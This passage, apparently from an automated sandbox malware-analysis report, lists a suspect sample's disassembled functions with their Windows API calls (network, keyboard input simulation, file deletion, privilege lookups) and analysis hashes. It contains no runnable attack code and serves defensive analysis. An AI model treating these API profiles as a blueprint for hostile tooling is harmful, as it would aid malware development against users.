                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003B6AE7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6AF7
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B6B5B
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6B67
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: cc4f4c4a954b2389f50bb5d6f725a1ee1b5b62c054c1b96fdbbd071e40b39ea5
                                                          • Instruction ID: b6feeb2a4ff4d6c354973d700de1c2ca8c5e2c689d55d037bacc9d201d368f3d
                                                          • Opcode Fuzzy Hash: cc4f4c4a954b2389f50bb5d6f725a1ee1b5b62c054c1b96fdbbd071e40b39ea5
                                                          • Instruction Fuzzy Hash: B7417B74640200AFEB22AF24DC87F7A77E9EB44B14F448419FA599F3D2DA74AD408B91
                                                          Function 003B6530 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003CF910), ref: 003B65BD
                                                          • _strlen.LIBCMT ref: 003B65EF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 1b06d096668a14c7a3078fe7ad04d7bf4a0a808f3e8eff672075126b6b419539
                                                          • Instruction ID: 6ffe5b8b1d0565c87511dbc942601b50c2be36f649baf2ba14011dd55fd7e302
                                                          • Opcode Fuzzy Hash: 1b06d096668a14c7a3078fe7ad04d7bf4a0a808f3e8eff672075126b6b419539
                                                          • Instruction Fuzzy Hash: BC417E71A00104ABCB16EBA4DCD6FEEB3E9EF44314F148169F91A9F692DB34AD04CB51
                                                          Function 003AB880 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003AB92A
                                                          • GetLastError.KERNEL32(?,00000000), ref: 003AB950
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003AB975
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003AB9A1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 52df12ae3144a95de681e405be737852b8c8a87229e2b83b64b8e80e7a51fb58
                                                          • Instruction ID: e70b5b4402cb0a5852b362f2311320c005d63d920fb332555d354c6e983f1c0f
                                                          • Opcode Fuzzy Hash: 52df12ae3144a95de681e405be737852b8c8a87229e2b83b64b8e80e7a51fb58
                                                          • Instruction Fuzzy Hash: 87412839600650DFCB12EF15C484A5ABBF5EF89310B098489E94A9F762CB34FD00CF91
                                                          Function 003C8883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C8910
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 1fe43c654343c7677f025c3ffd71809a1b99d6aa3f0bf4da55956dd5d65a4802
                                                          • Instruction ID: 933d7ebde6b422d420b6999724af288238fb2b00c6a7854f84cb79d9127c2722
                                                          • Opcode Fuzzy Hash: 1fe43c654343c7677f025c3ffd71809a1b99d6aa3f0bf4da55956dd5d65a4802
                                                          • Instruction Fuzzy Hash: 1031C130601208BFEF239B58CC49FB93769EB06310F554529FA51E66E0CF31AE909B52
                                                          Function 003CAB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 003CAB92
                                                          • GetWindowRect.USER32(?,?), ref: 003CAC08
                                                          • PtInRect.USER32(?,?,003CC07E), ref: 003CAC18
                                                          • MessageBeep.USER32(00000000), ref: 003CAC89
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 3dc8e1acb05f815682cb3c8c13833921bbc055a2a9b84df0f91011ab6c75d517
                                                          • Instruction ID: f7cbad4978ba7fa85ef08e10f45cf32df9fbdd3c3bb3648ed95d4f688bae7667
                                                          • Opcode Fuzzy Hash: 3dc8e1acb05f815682cb3c8c13833921bbc055a2a9b84df0f91011ab6c75d517
                                                          • Instruction Fuzzy Hash: 3B4159316009189FCB12EF58C984F597BF6FB48318F15C1A9E814DB260D730AC41DF52
                                                          Function 003A0E07 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003A0E58
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 003A0E74
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003A0EDA
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003A0F2C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 67cf02a265650068b4baad37977fb12eb648e2479061cf662491ffd9b022b20e
                                                          • Instruction ID: 076c8254e44f054f4088f0c228590328dd37ff9f0c0b292972ad90d930614b4d
                                                          • Opcode Fuzzy Hash: 67cf02a265650068b4baad37977fb12eb648e2479061cf662491ffd9b022b20e
                                                          • Instruction Fuzzy Hash: FB314870A40A18AEFB3B8B248C09FFEBBA9EB4B310F18461AF1D0521D1C3759955A795
                                                          Function 003A0F42 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003A0F97
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 003A0FB3
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003A1012
                                                          • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003A1064
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 1e4fc330342d4e2c71f0cbc6302a27745246bbef7baee6681a3b763521d5aed0
                                                          • Instruction ID: 6a5dddc7aab4ef4b90f9b7dcdb0678fcf10d20995aa32ffb272288380825160a
                                                          • Opcode Fuzzy Hash: 1e4fc330342d4e2c71f0cbc6302a27745246bbef7baee6681a3b763521d5aed0
                                                          • Instruction Fuzzy Hash: 4D314C30940298DEFF37CB248C08BFABB7AEB57311F09421AE495961D1C37999D19761
                                                          Function 00376345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0037637B
                                                          • __isleadbyte_l.LIBCMT ref: 003763A9
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003763D7
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0037640D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 4c086b808d3b5f9c54c4e9cc3dc0e92080d4e9ceef10800627ccd63935509b9a
                                                          • Instruction ID: 98ecfc2a2a71a411bca745dcfcd3d97d3dad1e685cdf62d66e4ff375838c5238
                                                          • Opcode Fuzzy Hash: 4c086b808d3b5f9c54c4e9cc3dc0e92080d4e9ceef10800627ccd63935509b9a
                                                          • Instruction Fuzzy Hash: B831A335600645EFEB328F66C856BAA7BA9FF41310F168129E4198B1A1D735EC50DB50
                                                          Function 003C4F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 003C4F6B
                                                            • Part of subcall function 003A3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003A369F
                                                            • Part of subcall function 003A3685: GetCurrentThreadId.KERNEL32 ref: 003A36A6
                                                            • Part of subcall function 003A3685: AttachThreadInput.USER32(00000000,?,003A50AC), ref: 003A36AD
                                                          • GetCaretPos.USER32(?), ref: 003C4F7C
                                                          • ClientToScreen.USER32(00000000,?), ref: 003C4FB7
                                                          • GetForegroundWindow.USER32 ref: 003C4FBD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 3236f3fbf749e1d83eff9f95cfa950bf6e83291f919b42b1d35a30c32f74fcd4
                                                          • Instruction ID: 19ad2ed5a2a18c1f0f4d6bdb36afa3b3dce2d7164b4756cad83508e3335d7272
                                                          • Opcode Fuzzy Hash: 3236f3fbf749e1d83eff9f95cfa950bf6e83291f919b42b1d35a30c32f74fcd4
                                                          • Instruction Fuzzy Hash: 89311E71900108AFDB01EFA5C885EEFB7FDEF98304F11406AE515EB251EA75AE45CBA0
                                                          Function 003CC502 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • GetCursorPos.USER32(?), ref: 003CC53C
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0037BB2B,?,?,?,?,?), ref: 003CC551
                                                          • GetCursorPos.USER32(?), ref: 003CC59E
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0037BB2B,?,?,?), ref: 003CC5D8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: e49590f4db61f01e5e20169c930182b98e1f68fa9be6e648b35e9037446ca18f
                                                          • Instruction ID: 114de1f6b05c83993c79bf7637c0d96ed9fe556f5a1a3a54ec651b49f49f4d3a
                                                          • Opcode Fuzzy Hash: e49590f4db61f01e5e20169c930182b98e1f68fa9be6e648b35e9037446ca18f
                                                          • Instruction Fuzzy Hash: 4931CE36610418AFCB169F59C858EAB7BFAEB4A310F044069F909DB2A1C731AD51DFA0
                                                          Function 0039897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00398432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398449
                                                            • Part of subcall function 00398432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00398453
                                                            • Part of subcall function 00398432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398462
                                                            • Part of subcall function 00398432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398469
                                                            • Part of subcall function 00398432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039847F
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003989CB
                                                          • _memcmp.LIBCMT ref: 003989EE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00398A24
                                                          • HeapFree.KERNEL32(00000000), ref: 00398A2B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 1a07f498dd551955b179b7af74a87f410036e8472c3799c559dbae5ee08055f9
                                                          • Instruction ID: 339c23d9b5c92fa6f6c636dea4bed2b46d46b286007c67380cb4df62022d76f9
                                                          • Opcode Fuzzy Hash: 1a07f498dd551955b179b7af74a87f410036e8472c3799c559dbae5ee08055f9
                                                          • Instruction Fuzzy Hash: CA218C71E40109EFDF11DFA4C945BEEB7B8EF85355F19805AE854AB240DB30AA05CF51
                                                          Function 00360B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __setmode.LIBCMT ref: 00360B2E
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A793F,?,?,00000000), ref: 00345B8C
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A793F,?,?,00000000,?,?), ref: 00345BB0
                                                          • _fprintf.LIBCMT ref: 00360B65
                                                          • OutputDebugStringW.KERNEL32(?), ref: 00396111
                                                            • Part of subcall function 00364C1A: _flsall.LIBCMT ref: 00364C33
                                                          • __setmode.LIBCMT ref: 00360B9A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 0bad1938e3ca5bca390937c7ebe71134105ad794880a4fe48e8ed3f78a9c4695
                                                          • Instruction ID: 31f90a9efe5e4303070d6f5ab4e19e3704c427d9da43ef09f89d522abe15838b
                                                          • Opcode Fuzzy Hash: 0bad1938e3ca5bca390937c7ebe71134105ad794880a4fe48e8ed3f78a9c4695
                                                          • Instruction Fuzzy Hash: 6311E432D046047EDB0BB7B49C879BE7BADDF41320F14806AF104AF296DF6158454BA5
                                                          Function 003B187D Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B18B9
                                                            • Part of subcall function 003B1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B1962
                                                            • Part of subcall function 003B1943: InternetCloseHandle.WININET(00000000), ref: 003B19FF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                                          • Instruction ID: 7ce540a156166345d0b97c408db9ea913e3fa286294293f22069c13fe2166be2
                                                          • Opcode Fuzzy Hash: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                                          • Instruction Fuzzy Hash: 9421CF71200605BFEB139F608C20FBBB7AEFF48704F40412AFB15D6A50DB31A9119790
                                                          Function 003A3A6E Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,003CFAC0), ref: 003A3AA8
                                                          • GetLastError.KERNEL32 ref: 003A3AB7
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003A3AC6
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CFAC0), ref: 003A3B23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 3b87f9879b73265d145c6627abd5a7f5d30a3c4deb78110977c6c10947c8550b
                                                          • Instruction ID: a17bad99f2c490ba084eb28ae4593a03c82d448ed77ec65432c5c9891316e2c5
                                                          • Opcode Fuzzy Hash: 3b87f9879b73265d145c6627abd5a7f5d30a3c4deb78110977c6c10947c8550b
                                                          • Instruction Fuzzy Hash: E521C7745083019F8302DF28C8809ABB7E9EF56764F144A1EF499CB2A1D730EE45CB92
                                                          Function 00375262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00375281
                                                            • Part of subcall function 0036588C: __FF_MSGBANNER.LIBCMT ref: 003658A3
                                                            • Part of subcall function 0036588C: __NMSG_WRITE.LIBCMT ref: 003658AA
                                                            • Part of subcall function 0036588C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001,00000000,?,?,?,00360F53,?), ref: 003658CF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 72a690721fcda0d9691b7cec62dac6ce6e1f8ef5c4c14892d4c0121520a9e23b
                                                          • Instruction ID: 8e6111fee5dd972f2bcf5122f0377baa7859d22882668b128450a1d9afa25cfe
                                                          • Opcode Fuzzy Hash: 72a690721fcda0d9691b7cec62dac6ce6e1f8ef5c4c14892d4c0121520a9e23b
                                                          • Instruction Fuzzy Hash: 0411E332505A15AFCB3B2F74AC05A5E3B9CAB05360F21CA39F90DAE152DEB88D408794
                                                          Function 00344531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 00344560
